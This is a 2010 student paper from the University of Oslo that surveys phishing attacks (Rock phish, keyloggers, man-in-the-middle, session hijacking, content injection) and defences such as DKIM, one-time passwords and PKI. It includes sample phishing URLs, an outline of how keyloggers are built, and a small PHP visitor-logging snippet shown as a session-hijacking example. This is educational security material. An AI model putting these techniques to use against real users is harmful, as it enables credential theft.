2010

PHISHING ATTACKS AND

SOLUTIONS
Universitetet i Oslo

Shahab Bakhtiyari
Candidate nr. 16
Ummair Tahir
Candidate nr. 81
Table of Contents
1 Introduction ..................................................................................................................................3

2 History and definition of phishing ..............................................................................................4

2.1 Definition......................................................................................................................4
2.2 Categorization ..............................................................................................................4
3 Types of phishing ..........................................................................................................................5
3.1 Email phishing..............................................................................................................5
3.2 Rock phishing attacks...............................................................................................................6
3.3 Key loggers phishing................................................................................................................8
3.3.1 Increased use of keyloggers .............................................................................................. 8
3.3.2 Construction of keylogger ................................................................................................. 8
3.3.3 Keyloggers spread ........................................................................................................... 9
3.4 Man in the middle phishing attack .................................................................................................10
3.5 Session hijacking ..............................................................................................................................11
3.5.1 Types of session hijacking ..............................................................................................11
3.6 Content injection phishing...............................................................................................................13
3.7 Search engine phishing ....................................................................................................................14

4 Counter Measures.................................................................................................................................... 15
4.1 User Education ...........................................................................................................15
4.2 Email authentication ...................................................................................................15
4.3 Consumer reporting ....................................................................................................15
4.4 Antiphishing solution deployment..............................................................................15
4.5 Countermeasures for keyloggers ................................................................................17
4.6 Defence mechanism against MITM ...........................................................................18
4.6.1 PIK ...............................................................................................................18
4.7 Robust webbrowsers / blacklist ..................................................................................18

5 Involving Characteristics in phishing attacks .........................................................................19

5.1 Personal terms ............................................................................................................19
5.2 Business terms ............................................................................................................19

6 A piece of advice ........................................................................................................................20

6.1 Avoidance ...............................................................................................................................20
6.2 Interventions ...........................................................................................................................20
6.3 Treatments ..............................................................................................................................20

7 Conlusion ....................................................................................................................................20

8 References ...................................................................................................................................21
1.Introduction

Among people with criminal intentions, identity theft is a very popular idea. These people, with their
bad intentions trick other to give up their money or other important belongings.
To take an example; we have a great trust in the police, therefore, a cheat disguised in the uniform of a
policeman could easily be able to scam us. He could lead many deceived without anyone being
suspicious. In today’s society, a person’s identity is at stake at the same level as his car or house. A
criminal of this century has the identity of people on their primary target list.
Phishing is something in the same direction as the policeman example mentioned. The only difference
is that this scam is happening online, and the victim does not even have to see the phisher.

Nowadays, Internet plays a significant role in online commerce and business activities. However, the
weak security on the Internet and, a huge economic benefit which attracts criminals to earn quick
money in this field. Security risks on the Internet has grown exponentially since the online services
have become more popular. This risk can be harmful and undesirable events may occur in different
applications, which possibly have some security gaps. There may be a risk that personal and sensitive
data can be hijacked over the unprotected Internet lines.

In this paper, we will look a little closer on the phenomenon of phishing, which is the most common
technique that thieves use to obtain what they want; our secret information like confidential documents,
passwords, PIN-codes. In general, they can monitor all our activities on the Internet. We intend to
examine some of most common types of phishing and see if there is a way(s) that can save internet
users to stay secure.

According to the statistics from APWG (Anti-phishing Working Group), the fourth quarter of 2009 saw
a rise in the number of hijacked brands to a record 356 in October, up nearly 4.4 percent from the pre-
vious record of 341 in August 2009. Phishers continue to expand their target base to attach new brands.

Rock phishing Kit, Key loggers, Session Hijacks, Content Injection phishing, “universal” man-in-the-
middle phishing kit and search engine phishing are some types of phishing attacks en internet user can
encounter..
Some solutions like Phishing blacklist, email authentication, two-way authentication, one-time
passwords etc. is reviewd in this article.

At the end of this paper we will suggest some preventive and usefull advices for internet users to pro-
tect themselves against phishers and generally by taking those steps they would reduse threat dramati-
cally.

2.History and definition of phishing

In 1995, some hackers succeeded in exploiting AOL by making a fake program that generated credit
card numbers to open AOL accounts, using algorithms. This is the first recorded phishing attempt.

2.1 Definition
“Phishing is a criminal mechanism employing both social engineering and technical subterfuge to
steal consumers’personal identity data and financial account credentials” [11]

“The word phishing originally comes from the analogy that early Internet criminals used email
lures to “phish” for passwords and financial data from a sea of Internet users. The use of “ph” in
the terminology is partly lost in the annals of time, but most likely linked to popular hacker
naming conventions such as “phreaks” which trace back to early hackers who were involved in
“phreaking”- the hacking of telephone system.” [8]

2.2 Categorization
Phishing attacks are categorized dependent on their sophistication and the way they are mitigated, for
example some use only email whereas other use a combination of email and a website. The latter one is
more common today. Some phishing attacks are technically more sophisticated and make use of well-
known vulnerabilities in popular web browsers such as Internet explorer to install malicious
software(i.e. malware) that collect sensitive information about the user.
Rock phishing Kit, Key loggers, Session Hijacks, Content Injection phishing, “universal” man-in-the-
middle phishing kit and search engine phishing are some types of phishing attacks.
Some of the solutions are Phishing blacklist, email authentication, two-way authentication, one-time
passwords etc.

A common factor among the majority of phishing sites is that they mislead
users to believe that they are legitimate sites. Thus recognizing phishing sites is basically an
authentication problem between users and servers. Applications on the Web normally involve users’
authentication before getting access to a requested source. Authentication for users differs from simple
to strong. It depends on security policies that are sat up on resources or services. For example a clear
text password based authentication will suffice to enter a Web forum whereas an online banking
requires the use of certificates and a policy of key infrastructures.
TLS 1 is the “de facto” standard nowadays for doing secure Web and electronic-commerce transactions.
Its native integration with web browsers and web servers has made it most popular security protocol.
Unfortunately, TLS itself can not alone resist against spoofing attacks, and usually relies on web
browsers to check and validate the entity certificate. Consequently several mitigating methods have
been given by browser vendors to weaken the threat of being infected by phishing attacks. However,
these solutions need modifications at the application layer and create scalability problems [1]. Some of
solutions are going to be reviewed in this paper after at we have presented some types of attacks..

3. Types of phishing

3.1 Email Phishing

Phishing scam on the Internet starts with an email message that looks like an official communication
from a reliable source such as a bank, a credit card company or a reputable online store. In the e mail
recipients, are directed to a fraudulent website where they are asked to provide personal information
such as account numbers or passwords.
Message is sent out to several people where they for example are told that there are problems with
some credit from the bank. The problem, however, according to e-mail, easily solved by following an
attached link to a website, where the victim is asked to enter his personal data like name, DOB and
credit card details. This data are then used to tap money from the card.
It is all made more credible when the e-mail looks like it is from a reputable bank and that the website
you come to look quite like the official website of this bank, defraud clean using a script that first open
the bank's actual website and then a smaller window, which loads from the attacker's server, where the
address bar is not visible. This allows for many looks as you come into the bank's website, and it feels
safer to enter the appropriate information. And even though most might not be fooled, suggests "the
major's law" that so many people want that kind of computer crime has proved profitable.

3.2 Rock phishing attacks

In beginning of the 21st century, a group of phishers arose who were suspected to be working in Eastern
Europe. They were given the name “Rock phish gang” because the early version of their attacks
contained word “Rock” in the URL. For example:

‘ http:/www.bankname.securesite.com/rock/234/signing.html’

They are still very active although they are not using the same naming convention. They have targeted
international and local banks throughout USA, Europe and South America. Recently, they have
1
Transport Layer Security (TLS) and its predecessor, Secure Socket Layer (SSL), are cryptographic protocols that
provide security for communications over networks such as the Internet. TLS and SSL encrypt the segments of network
connections at the Transport Layer end-to-end.
2
DNS The distributed database, sometimes including all the supporting hardware or software infrastructure, the
Internet uses to translate hostnames into IP numbers and provide other domain related information
broadened their scope to involve online brokerages, information services, treasury management
companies and even social networking sites.
In June 2007 they used several techniques in order to make them more difficult to be recognized and
mitigated. In an elaborate multi-tiered scheme they use the stolen credentials of the victims to register
multiple domain names at multiple registers. These domain names are generally short and senseless
like “342egt.info”. The gang then hosts their own authoritative DNS 2 servers using wildcards “A”
records to provide name-to-IP services for each of the fraudulently registered domain names. The IP
addresses used point to multiple compromised PCs. These PCs are a part of a botnet which acts as
proxy connections to a plenty of servers that host phish pages.
The challenge of this kind of attacks is that each layer of the phisher’s infrastructure (DNS,proxy
server, back-end-server) contains redundancies and variations. The benefit for attacker is that attacks
can continue unfettered when each element of the system is shut down(a traditional phished site can be
overcome after removing the host website or domain , but Rock Phish attacker share the hosts and
domains, so that in the case of removing one of them, it will automatically switch to another).

Tracing Rock attacks are much difficult to keep trace all the way through to the back end server. The
phisher changes its host or domain names fast and works as if they are moving much, leaving in a cycle
which leaves the international security community in a difficulty. They seem to be able to make
unlimited combinations of multiple tiers when they attack. Actually their matrix of hosts gives them a
robust system with many level of failover. In case of a domain server is taken down, then name-to-IP
services turn to another server. If a proxy server which acts on a compromised host is defeated then it
would turn over another compromised host.

Rock phishers to overcome site-blacklisting mitigations; use a huge number of slimly name-varied
URLs to draw preys to their spoofed WebPages, for example:

http://welcome23.bank.com.cbibsweb168st.342egt.info/confirm/submit.do/
http://welcome24.bank.com.cbibsweb59121j.342egt.info/confirm/submit.do/
http://welcome22.bank.com.cbibsweb146121k.342egt.info/confirm/submit.do/
http://welcome24.bank.com.cbibsweb574721a.342egt.info/confirm/submit.do/

According to ‘MarkMonitor’ 1 up to 5000 URLs targeted a single organization in the period of one
month. The large number of attacks in such a short period shows that approximately 50% of all active
phishing in the period can be associated with the Rock phish gang. As far as a single URL have
capability to resolve a single IP address, the attack succeeds in gaining information. Many
combinations of URLs, hosts, domains and DNS servers can exist [5].

Now Rock attacks are even more evolved, the email they send to their victims contains probably a
random text that is followed by GIF (Graphical Image Format) image in holding the real phishing
message. Currently, most of spam filters lack an efficient algorithm to distinguish these GIF images.
Therefore they are ineffective in such cases. This can make rock phishing attacks through this approach
quite efficent. There are many analysts who believe that between one third and one half of all attacks
belong to the Rock attacks category.

3.3 Key loggers phishing

The term “key logger” describes itself what it does. Keyloggeing, in a very abstract categorizing is
divided in two categories: key logging devices and keylogging software. The first category is normally
small devices that can be attached to the keyboard or placed within a cable to computer. And the
keylogging software are programs which is designed to track and log keystrokes [3].

Keyloogers software installs themselves either into a web browser or as a driver for a device. They
secretly monitor and log all keystrokes which input in a PC, and forwarding the data to a specific
phishing server. They use many dissimilar methods and might be implemented in many ways, for
instance [2]:

- A browser helper object that finds changes to the URL and logs information when a web address is
in a desired credential collection site.
- A device driver that controls mouse and keyboard inputs in conjunction with monitoring the user’
activities
- A screen-logger that monitors both the users’ inputs and the display to thwart alternate on-screen
input security measures

Keylogging devices are much rarer than keylogging software, but it is important to keep their existence
in mind when thinking about information security.
Keyloggers can collect information for a wide variety of sites, they are usually packaged to the monitor
the users’ location and only transmit credentials for particular sites. Usually hundreds of such sites are
attacked, like financial institutions, information portal, and corporate VPNs (Virtual Private Networks).
Secondary insecurity can happen when a keylogger is compromised. In one real-world example the
inclusion of a credit reporting agency in a keylogger spread via
Pornography Spam led to the compromise of over 50 accounts with access to the
Agency, which in turn were finally used to compromise over 310,000 sets of personal information from
the credit reporting agency’s database [2].

The majority of keyloggers are supposed to be legitimate software and hardware and are sold in an
open market, there can be many factors motivating customers to buy a keyloggers such as:
- Parental control : parents can track their children activities
- Jealous spouses
- Company security :tracking the use of computers in a company
- Other security reasons

Today, key-loggers are mainly used to steal user information related to on-line payment systems, and
hacker and phisher continuously writing new keyloggers and Trojans for this very purpose.

On the contrary of many other malicious softwares, keyloggers do not threat or damage computer
itself, but they can pose serious threats to users, they can among others be used to read confidential
information entered via keyboards. As a result it can be used from cyber criminals to gain PIN codes
and passwords emails, bank accounts etc.
Once a phisher for instance, have access to confidential data from a user, s/he can easily transfer
money from the users’ on-line gaming account.

Unfortunately having access to a user’s confidential data can have far more harms than just missing a
little amount of money. Accessing data which may include proprietary commercial information and
classified government material which could compromise the security of state-owned organizations.

In recent years, we have seen a large increase in number of different kind of malicious programs which
have key-logging functionality. No Internet user is immune against cyber criminality, no matter where
in the world s/he is and no matter what organization s/he works for.
A real-world example:

One of the most publicized key-logging incidents recently was the theft of over $1million from client
account at the major Scandinavian bank Nordea. In August 2006 a Nordea client started to receive
emails, allegedly from the bank, suggesting that they install an antispam product, which was
supposedly attached to the message. When the user opened the file and downloaded it to his computer
the machine would be infected with a well known Trojan called haxdoor. This would be activated
when victim registered at Nordea's online site, and it would falsly give the victim an error message
requesting him to re-enter his information. The Trojan which exits in computer would record data
entered by bank's client, and this data would be send to the phishers' server. According to haxdoor's
authore the Trojan has also been used in attacks against Australian banks and many others.

3.3.1 Increased use of keyloggers

The fact that cyber criminals choose to use krylogers time and again is confirmed by IT security
companies.
One of VeriSign's1 recent reports illustrates that lately, the company has experienced a sharp increase in
the number of malicious programs that have keylogging functionality.

Source: iDefense, a VeriSign Company

Kaspersky lab [4] is continuously finding new type of spoofing softwares which have keylogging
functionality. Kaspersky lab's dedicated malware information site alerted on one of the first viruses of
type keylogging on www.viruslist.com was published on 15 June 2001. The warning was about a
Trojan called TROJ_LATINUS.SVR, a Trojan with keylogging functionality. Afterwards there have
been a gradually increase in new modifications and new keyloggers. Kaspersky database presently has
recorded more than 300 families of keyloggers. This number does not include keyloggers that are part
of more complicated threats.
The majority of new malicious programs are hybrids which implement many different methods. It has
caused that; any category of malicious program may include programs with keylogger (sub)
functionality. The number of spy programs detected by Kaspersky Lab each month is on the increase,
and most of these programs use keylogging technology.

3.3.2 Construction of Keylogger

There is a main common idea between most of keylogger, that is to get in between any two links in the
chain of events between when a key is pressed and when the information about the stroke is displayed
on the monitor. This can be achieved using video surveillance, a hardware bug in the keyboard wiring
or the computer itself, intercepting input/output substituting the keyboard driver, the filter driver in the
keyboard stack, intercepting kernel functions by any way possible, intercepting DLL functions in user
mode, and finally using standard documented methods to request information from the keyboard.

There is three common construction in making a keylogger[3] :

1- A system hook which intercepts notification that a key is pressed (often written by C)
2- A cyclical information keyboard request from the keyboard (often written by Visual Basic)
3- Using a filter driver (written in C programming language and need specialized knowledge)

Figure 3
Different types of keyloggers

The chart above shows [3] a rough breakdown of the different types of keyloggers using three methods
described above.

3.3.3 How keyloggers spread

Like many other spoofing programs, keyloggers are overspread in the same way. Here in addition to
some extra ways, for instance, when keyloggers are purchased and installed by jealous spouse or by
security services in organizations.
Some of the most common ways spreading keyloggers are, a keylogger[3]:
– can be installed when a user opens a file attached to an email.
– can be installed when a file is launched from an open-access directory on a P2P network
– can be installed via a web page script where they exploit browsers vulnerability
– can be installed by another malicious program which already exists in victims machine.
3.4 Man – in – The - Middle Phishing attack

The Wall Street journal July 5, 2008:

"The plan had a chance of working because, for months, in an operation one army officer
likened to a 'broken telephone,' military intelligence had been able to convince Ms. Betancourt's
captor, Gerardo Aguilar, a guerrilla known as 'Cesar,' that he was communicating with his top
bosses in the guerrillas' seven-man secretariat. Army intelligence convinced top guerrilla
leaders that they were talking to Cesar. In reality, both were talking to army intelligence." [20]

This ploy worked because Cesar and his guerrilla bosses didn't know one another well. They didn't
recognize one another’s' voices, and didn't have a friendship or shared history that could have tipped
them off about the ruse. Man-in-the-middle is defeated by context, and the FARC guerrillas didn't have
any.

And that's why man-in-the-middle, abbreviated MITM in the computer-security community, is such a
problem online: Internet communication is often stripped of any context. There's no way to recognize
someone's face. There's no way to recognize someone's voice. When you visit a website, you have no
idea if you're really visiting that website. We all like to pretend that we know who we're
communicating with - and for the most part, of course, there is not any attacker inserting himself into
our communications - but in reality, we don't.

‘In this type of phishing, the attacker uses a so called Universal Man – in – the – middle phishing kit to
insert himself between two communicating parties. Both believe they are talking to each other, and the
attacker can delete or modify the communications at will.’
The MITM - kit consists of a PHP file which is installed on a server. The server acts as a proxy
between the victim of the phishing attack and a genuine website.

It can also be referred to as bucket - brigade attack, or sometimes Janus attack [20]. This type of attack
is today the most common method used for tricking the users. This threat started around 2006 and was
considered to be very sophisticated.
Man-in-the-middle attacks may be performed using many different types of phishing. Some forms of
phishing, such as proxy attacks, are inherently man-in-the-middle attacks. However, man-in-the-middle
attacks may be used with many other types of phishing, including DNS-based phishing and deception-
based phishing. The MITM attack can be very harmful and sometimes catastrophic because data com-
municated between hosts can easily be altered. The wireless and mobile access network has become
widespread in the last 5 -10 years and hence provided an open gateway for this form of phishing to
emerge and enhance.

As an example of the MITM attack, we can consider a TCP or SSH connection between a client and a
server. The attacker can split the original connection by using various techniques into two new
connections. One is between the client and the attacker and the other between the server and the
attacker [22]. The attacker has to be capable of intercept all the messages going between the two
victims and insert new ones. Figure x shows how the attacker or the fake server lures the server and the
client in believing that they are communicating with each other. This is done by compromising the host
key [1] between the client and the host. The client establishes a connection with the server. Unknown
to both the server and the client, the attacker waits to intercept the negotiation. When the authentication
process is to take place, the attacker, being the middle man, receives clients request for authentication
because he identifies him as the server (Alice) the client (Bob) wants to connect with. Eve, the MITM
then establish a connection with Alice pretending to be Bob. In this way a secure connection is set up,
and now Eve, the man-in-the-middle, can see all the communication between the client (Bob) and the
server (Alice).

In a plain and simple language, let us consider a simple bank attack where the bank requires some form
of authentication from the user, which is a password or PIN code. The phisher, sitting in the middle,
acquires him this password through forwarding the password request from the bank to the user. In this
way, both of the victims are fooled by the phisher. They both think they are communicating with each
other while the attacker can feel himself free to send transactions directly to the bank.

Example of MITM

3.5 Session Hijacking

Session hijacking is taking over a user session. Essentially it is when two computers establish a
connection and an attacker assumes the position of one of the computers through their session id [25].
Session hijacking can be performed locally on a user’s computer, or remotely as a part of a man-in-the-
middle attack.

This form of attack is performed on two levels. Session hijack attacks on the application layer are
performed through TCP and UDP while hijacking on the network layer involves the hijack of HTTP
sessions .These two kinds of attacks can often occur simultaneously, but it depends on the system being
attacked. Attacks on network level are most appealing for the attacker. The reason for this being that
their attacking program does not have to be tailor-made for the web application. It simply can attack the
data flow of the protocol, and that is common for all web applications. The most common methods for
session hijacking are listed below:

3.5.1 Types of session hijacking

Session fixation, where the attacker sets a user's session id to one known to him, for example by
sending the user an email with a link that contains a particular session id. The attacker now only has to
wait until the user logs in.
Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as
trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the
cookie or perform other operations.

Session side jacking, where the attacker uses packet sniffing to read network traffic between two
parties to steal the session cookie.
Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but
do not use encryption for the rest of the site once authenticated. This allows attackers that can read the
network traffic to intercept all the data that is submitted to the server or web pages viewed by the client.
Since this data includes the session cookie, it allows him to impersonate the victim, even if the
password itself is not compromised.
As an example, we will explain session hijacking at the application layer. At this level, the attacker can
hijack already existing sessions as well as create new sessions from the stolen data.

One way of the session hijacking is the HTTP Session Hijack. It constitutes of acquiring Session Ids’
for the sessions. A session ID is the only unique identifier for the HTTP session. A sessionID can be
found at three places.
• In the URL received by the browser for the HTTP GET request.
• With the cookies which will be stored in the victims computer.
• Within the form fields [27]

The second point in the above listing is described below:

1. User A and B are both logged on 'somesite.com'.

2. User A has no administrative authorities but the user X does.
3. User A posts a link somewhere for user B to click.
4. Upoun a cilck on this link it is logged on a webpage which later can be used for harmful
purposes. [28]

The webpage that logs the information about the session can look like this
log.php
session_start();
if($_SESSION["logged"] != "yes")
{
* $agent = $_SERVER['HTTP_USER_AGENT'];
* $uri = $_SERVER['REQUEST_URI'];
* $ip = $_SERVER['REMOTE_ADDR'];
* $ref = $_SERVER['HTTP_REFERER'];
* $visitTime = date("r");*** *** //Example: Thu, 21 Apr 2010 16:01:07 +0200
*
*
* $logLine = "$visitTime - IP: $ip || User Agent: $agent* || Page: $uri || Referrer: $ref\n";
* $fp = fopen("visitorLog.txt", "a");
* fputs($fp, $entry_line);
* fclose($fp);
* $_SESSION["logged"] = "yes";
}

The log.php file that logs the information about the session
 Example of session hijacking[29]
Manipulating the token session executing the session hijacking attack.

3.6 Content Injection phishing:

Content injection phishing is a kind of phishing in which the attacker put in harmful content into a
normal legal website. The content has is able to redirect the user to other sites and install malware on
users machine. It can also insert a frame of content which redirect data to a phishing server [30].
 Figure X [32]
An example of a link that redirects the user to another link.

There are many variations in each kind of content injection phishing attack, but generally there are
three prime types of it. These are:

1. The attackers checks for penetrable servers through a security vulnerability. When they get into
the server, they replace the legal information with malicious content
2. As in the case of Session hijacking, also here cross site scripting is used. It takes advantage of
the programming flaw of a site and uses it for the phishers benefit. Such externally supplied
content can be a malicious script or other content that is not well enough filtered out by a
software on the server of the site.
3. These kinds of harmful attacks can also be performed through SQL (Structured Query
Language) injection. The attacker can as in case of cross-site scripting insecurity, take
advantage of this and execute commands on a remote server that can cause information leakage
due to improper filtering.

3.7 Search Engine Phishing

Another injection method that phishers use to lure users is that they make fake web pages for products
and services; search engines find these pages and give them index, so that in a search done by a user,
the search engine offers fake pages as elements of search result. These pages offer usually goods and
services in a very reasonable price. For example, a phisher creates a page advertising an interest rate
slightly higher any other real banks. Tempted victims who have found these pages via search engines,
enter their bank account credentials for a “balance transfer” to the “new account”. The phisher receives
sensitive information as part of an order, sign-up or balance transfer [2] .

4. Countermeasures
In the former sections, we have presented the types of phishing attacks, which indeed can leave some
serious damage. Companies are constantly trying to strengthen their online security. There is no
absolute way to overcome phishing. Institutions and users generally must rely on a distributed, multi-
leveled (multi-tiered) defense as phisheres have turned to a distributed, multi-tiered system of attacks.
A variety of technical and social techniques must be employed. Some of them[5] are shortly argued :

4.1 User Education:

Users are generally an important factor in the war against cyber crime like phishing. If a user could
manage to inspect email headers, verify URL addresses and not to reveal its confidential information to
phishers, then the problem to a great extent is solved. User education can be an inexpensive yet high-
profile way to reduce fraud while convincing customers that their trust is important to a business.
Having mentioned this, it cannot be expected that every single user has this awareness, proficiency and
capability of understanding terms as for example an email header or a URL address.

4.2 Email Authentication

Email authentication is another important element to prevent phishing. Business owners should
implement an email authentication technology such as SenderID or Domain Keys Identified Mail
(DKIM) on their email systems. Since SMTP (Simple Mail Transfer Protocol) which is most popular
standard for email traffic, supports no email authentication, it has been very easy for phishers to send
spoofed emails messages that seems to be coming from a legitimate domain. DKIM can verify the
domain of an email sender and the message integrity (whether message has been altered or not).
Consequently, it does it much harder for phishers to send spam email masqueraded as a legitimate
message. DKIM and SenderID are complementary technologies, it is ideal for business to implement
both together.

4.3 Consumer reporting

Since no user is excluded from being spoofed on the Internet, the users themselves have been assiduous
to contribute in helping to recognize and report suspected hoaxes. This is one of the methods which
have been succeeded in identifying spoofing sites. Companies which are potentially targeted should
make an easy way for customers to report phishing and other Internet scams: they should provide their
customers a link on their home page in order to everyone can easily report suspected fraud.

4.4 Anti-phishing Solution Deployment

Organizations and institutions must be proactive to protect their customers, brand and reputation from
the threat of phishing. Among many others, preventing the establishment of cousin or mock domains,
detecting and analyzing of attacks and technical and physical shutdown of phishing sites are some of
solutions. Some countermeasures prevent phishing from happening by authenticating and filtering
email. Some other filter web content through consumer products like browser toolbars. In many cases
relying on an Internet data center that collects, analyzes and responds to threats are essential in
functionality of a solution. Many rely on consumers to report spoofing-emails and phishing websites
and then target them for shutdown.

4.5 Counter measures for keyloggers

Since making protection against keyloggers has no difference from protecting against other types of
malicious programs, most antivirus companies have already added distinguished keyloggers to their
databases. Install an antivirus product and keep it up to date. Keyloggers are classified as potentially
spoofing or undesirable programs for antiviruses thus users should ensure that their antivirus will, with
default settings, recognize these kind of software. If not, then it should be set to accordingly to ensure
protection against most common keyloggers.

However, protecting against unknown malware is more complicated and the challenge is greater.
Since the main goal of keyloggers are to get confidential data of a user (passwords, bank card numbers,
etc.) there is some logical ways to protect against unknown keyloggers:

- using one time passwords or two step authentication

- using a system with proactive protection designed to detect keylogging software
- using a virtual keyboard

Since one-time passwords are valid only for one time’s use, and the time for using them is limited,
they minimize the risk of loss in case of being compromised.

There is several ways to get or generate one-time passwords. We name here only three of them:

1- a USB key , such as eTokens 3 like eToken NG OTP

2- a ‘calculator’ such as RSA SecureID2

1
“an eToken is a hardware mechanism used for password authentication via using identity management technique and
provides hacking problem solution to the user[6].”
2
“RSA is the premier provider of security solutions for business acceleration, helping the world’s leading organizations
succeed by solving their most complex and sensitive security challenges. Its technology coupled with professional services
and dozens of strategic third-party partnership- help organizations bring trust to millions of user identities, the activities
that they perform and the data that is generated [7].”
3 - Using mobile phone text messaging systems that are registered with the source system receiving a
PIN-code as a reply. The received PIN-code then is used together with another confidential code for
authentication.
Procedure for using each of above named methods are similar, as user connects to Internet and
opens the window where confidential information should be entered then s/he presses the device to
get or generate one-time password. Then user enters the asked data, usually PIN codes and
passwords are asked one after one to reduce risk of being lured by fake WebPages. The data then
would be processed by server and a decision will be made whether user should access to the source
of data or not [3].
Virtual keyboards are another means to protect against intercepting confidential data. A virtual
keyboard is a program that displays keys on the monitor, thus user does not need enter data via
keyboard rather clicking on mouse. Virtual keyboards in order to be used against keyloggers have
to be designed especially to ensure that information entered or transmitted via the on-screen
keyboard cannot be intercepted, otherwise, using an on-screen keyboard can be easily intercepted
by a malicious software.

4.6 Defense Mechanisms against the MITM

Since 2006, there have been many companies working on trying to provide us with a defense against
this threat. This kind of phishing is a huge threat as far as the economic terms are concerned. Therefore,
various anti-phishing groups are constantly working on new ideas to prevent MITM. There are various
methods for preventing MITM – attacks. The methods use different forms for authentications to
prevent an attack. The distinguished techniques consist of:
Public key infrastructures, mutual authentication with secret keys or passwords, latency examination, a
secure channel verification, one- time pads(see countermeasures for keyloggers) and carry forward
verifications. Some of these counter
measures will be discusses below.

4.6.1 Public Key Infrastructure (PKI)

The PKI deals with public authentication.
In cryptography, a PKI is an arrangement that binds public keys with the respective user
identities by means of a certificate authority (CA)[33]. User’s identity has to be unique
within each CA domain. The binding is established through the registration and issuance
process, which depending on the level of assurance the binding has, may be carried out by
a software at CA under human supervision, that is on the application layer. For each user, the user
identity, public key, their binding, validity conditions and other attributes are made untouchable in
public key certificates issued by the CA.
 Public key infrastructure.
Terms like CA, RA, and VA will not be explained in this section because they are beyond the topic of this paper.

Our Client Server Example:

In our example of Bob Alice and the attacker Eve, where a client tries to connect to another
Client after looking for security vulnerabilities. To avoid this, it has to be some security
enforcements on both sides. This is done with the use of PKI. Messages which come from a trusted
CA(certification authority) and have digital signature are trustable. We will not go into the depth of this
subject.

4.7 Robust web browser-blacklist

Some phishing attacks are technically seen more complicated, and exploit vulnerabilities in popular
web browsers did like Internet explorer from Microsoft and Firefox from Mozilla to install malicious
software (i.e. malware) that collects sensitive information. A keylogger ( mentioned in section
keylogger) might be installed. The keylogger logs all pressed keys whenever a user visits a site that
requires from the user to enter confidential information. Another possibility for the attacker could be to
change the proxy settings for the user’s browser so that all web traffic that user initiates, passes through
the attacker’s server to perform a typical man in the middle attack (section man-in-the-middle)
To mitigate phishing attacks as well as other security threats that are directly related to browser security
such as worms, Trojans and spywares). Browser manufactures need to make sure that their software is
bug-free and that users are up to date with the latest security fixes [10].
Several companies today, offer plug-ins for the browsers. These plugins can help to some extent keep
our sensitive data secure. They save confidential information and when these information is used again
they check if the corresponding web site is the one which was visited previously. If not, they prompt to
user informing that it can be a phishing website, offering to block it.
5 Involving characteristics in phishing
attacks
After a presentation of the most common attacks and their countermeasures, we can now specify some
of the characteristics which mostly are involved in these kinds of attacks. We will categorize the
characteristics into two groups in this section. One is from the personal or consumer point of view and
the other from the business or enterprise perspective.

5.1Personal terms
There are five major issues identified to be important from a personal or consumers point of view to be
considered [9]:

1- Education: educate the user considering prevention methods and a plan on preparing to avoid
phishing attacks.
2- Preparation: is the process of thinking and specifying which measures should be taken in case
of accruing a phishing attack.
3- Avoidance: include activities that stops the onset of an attack.
4- Intervention: This element includes activities that victim (individual or business) performs in
order to minify the damage caused by phishing attacks.
5- Treatment: activities which are done to recover a business after being affected by such attacks.

5.2 Business terms

As important as the consumer part of this world is, also the websites themselves bear an equally huge
responsibility in the process of making the world web ‘phishing-free’. Below, we will be listing some
of the important measures the IT-departments have to take in order to appear in front of the consumer
market; a legitimate and trustworthy actor and trader [34].

1. To decide if an email or a website is reliable can sometimes only be done in a single way; From
looking at the URL or the layout of the site. If one of these don’t look right the consumer has
the full right to be suspicious. So in order to be consistent, the company should have a
consistent branding especially when emails are sent to the customers, the ‘FROM’ domain name
should be the same as the consumers see on the website. Otherwise, there will be hard for the
consumer to differentiate between a fake and a real e-mail.

The company should help their customers in securing their systems by not requiring the use of
Javascript and Active-X. The website should be compatible with most of the browsers.

2. As mentioned above, the ‘FROM’ address in the process of mail communication with the
consumers is quite important because the phishers use the same approach to publicize their
websites as for spam mails. In order to make it look real, and maximizing the effect of the
attack, the phisher will try to use the same ‘FROM’ address, but the mail will bounce back to
the mail - server they were sent from as the mail address was fake.
3. After they have gathered the desired information, the phishers usually redirects the user back to
the original site; the user really was intending to visit in first place. The purpose of doing this is
trying to hide the phishing site from the user and to improve its plausibility. An enterprise can
 monitor its referrers to public websites by configuring the web- servers to log this data. Most of
servers are already setup to do this by default. This method of approach can help in discovering
new phishing sites.

6. A piece of advice
A general list of advices for the users to minimize the threat and to be prevented from being affected by
the phishiers is given below.

6.1 Avoidance: visit web sites by typing the URL-address into address bar, using spyware detection-
tools to discover spywares, identify phishing sites and work with other organizations to overcome
them, use firewalls: use patches that come from operating system to fill security holes, install an
antivirus and keep it up to date, do not send personal and confidential data via email, implement
mitigating strategies, mail authentication via digital signatures, implement anti-spam strategies.

6.2 Intervention(s), in case of uncertainty, contact company before submitting information, look for
URLs which begin with ‘https//:’ which ‘s’ indicates that the website is secure, look for ‘lock’ icon on
web browsers status bar before sending credentials via websites, be cautious before opening any mail
receiving from Internet, forward suspicious emails to relevant parties, don’t reply to emails which
claims an account shut down.

6.3 Treatment(s): implement strategy to determine the extent of damage caused by phishing attacks,
in case of acknowledging supplied information, contact the applicable company immediately to prevent
possible misuse.

7. Conclusion
Conclusion
As a final perspective of our topic, we will make a summary of what we have discussed in the former
sections. Phishing is a big problem indeed. It is also a big topic and due to restrictions and limitations
of time and the scope given, we have not been able to discuss all the types of this topic. Having said
this, we have touched the main methods of phishing and their ways of prevention. Cyber criminals are
much smarter today and will be even more in the future. They use different methods to target different
groups of users. Some of most popular ways that attackar use to lure internet users are Rock phishing,
man-in-the-middle phishing, keyloggers phishing and two type injection phishings.We argued that for
example how they try to lure bank customers by sending them fake web pages. By using one time-pad
passwords for example, among sugessted countermeasures in this paper, we can overcome the attack.

There are some practical steps which suggested in thw end of paper that if they are taken by internet
users, the threat can be removed totally or to a great extent.
8. References
[1] Phishing Attacks and Solutions,
Mohammad Badra, Samer El-Sawda
http://portal.acm.org/citation.cfm?id=1385340

[ 2] Online Identity Theft: Phishing Technology, Chokepoints and Countermeasures

Aaron Emigh . October 3, 2005
www.antiphishing.org/Phishing-dhs-report.pdf [accessed: 24.04.2010]

[3] Keyloggers: How they work and how to detect them

http://www.securelist.com/en/analysis/204791931/Keyloggers_How_they_work_and_how_to_d
etect_them_Part_1

[4] www.kaspersky.com/
[5] Rock Phishing: The threat and Recommended Countermeasures
www.markmonitor.com/download/wp/wp-rock-phish.pdf [accessed: 25.04.2010]

